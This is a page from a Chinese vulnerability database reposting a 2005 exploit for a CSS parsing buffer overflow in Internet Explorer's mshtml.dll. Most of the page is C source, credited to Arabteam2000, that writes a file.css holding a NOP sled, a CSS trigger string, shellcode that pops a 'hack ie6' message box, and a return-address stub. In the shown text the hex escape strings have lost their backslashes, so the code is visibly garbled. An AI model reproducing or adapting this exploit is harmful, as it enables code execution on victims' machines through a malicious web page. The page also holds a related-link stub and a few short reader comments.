Microsoft Internet Explorer – ‘mshtml.dll’ CSS Parsing Buffer Overflow
| 漏洞ID | 1054959 | 漏洞类型 | |
| 发布时间 | 2005-03-09 | 更新时间 | 2005-03-09 |
![图片[1]-Microsoft Internet Explorer – ‘mshtml.dll’ CSS Parsing Buffer Overflow-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-Microsoft Internet Explorer – ‘mshtml.dll’ CSS Parsing Buffer Overflow-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
Taken from http://www.securiteam.com/exploits/5NP042KF5A.html
The exploit will create a .CSS file that should be included
in an HTML file. When a user loads the HTML file, Internet
Explorer will try to parse the CSS and will trigger the
buffer overflow.
*/
//Exploit Code:
#include <stdio.h>
#include <string.h>
#include <tchar.h>
char bug[]=
"x40x63x73x73x20x6Dx6Dx7Bx49x7Bx63x6Fx6Ex74x65x6Ex74x3Ax20x22x22x3Bx2F"
"x2Ax22x20x22x2Ax2Fx7Dx7Dx40x6Dx3Bx40x65x6Ex64x3Bx20x2Fx2Ax22x7Dx7Dx20x20x20";
//////////////////////////////////////////////////////
/*
shellcode :MessageBox (0,"hack ie6",0,MB_OK);
-
XOR EBX,EBX
PUSH EBX ; 0
PUSH EBX ; 0
ADD AL,0F
PUSH EAX ; Msg " Hack ie6 "
PUSH EBX ;0
JMP 746D8E72 ;USER32.MessageBoxA
*/
char shellcode[]= "x33xDBx53x53x04x0Fx50x53xE9xCBx8Dx6Dx74"
"x90x90x48x61x63x6Bx20x69x65x36x20x63x73x73";
////////////////////////////////////////////////////////
// return address :: esp+1AC :: start shellcode
//MOV EAX,ESP
//ADD AX,1AC
//CALL EAX
char ret[]= "x8BxC4x66x05xACx01xFFxD0";
int main(int argc, char* argv[])
{
char buf[8192];
FILE *cssfile;
int i;
printf("nn Internet Explorer(mshtml.dll) , Cascading Style Sheets Exploit n");
printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n");
printf(" Coded by : Arabteam2000 n");
printf(" Web: www.arabteam2000.com n");
printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~nn");
// NOP`s
for(i=0;i<8192;i++)
buf[i]=0x90;
// bug
memcpy((void*)&buf[0],
(void*)&bug,48);
// shellcode
memcpy((void*)&buf[100],
(void*)&shellcode,27);
// ret address
memcpy((void*)&buf[8182],
(void*)&ret,8);
cssfile=fopen("file.css","w+b");
if(cssfile==NULL){
printf("-Error: fopen n");
return 1;
}
fwrite(buf,8192,1,cssfile);
printf("-Created file: file.cssn ..OKnn");
fclose (cssfile);
return 0;
}
// milw0rm.com [2005-03-09]相关推荐: MadBMS Unspecified Login Vulnerability
MadBMS Unspecified Login Vulnerability 漏洞ID 1098710 漏洞类型 Unknown 发布时间 2004-03-31 更新时间 2004-03-31 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666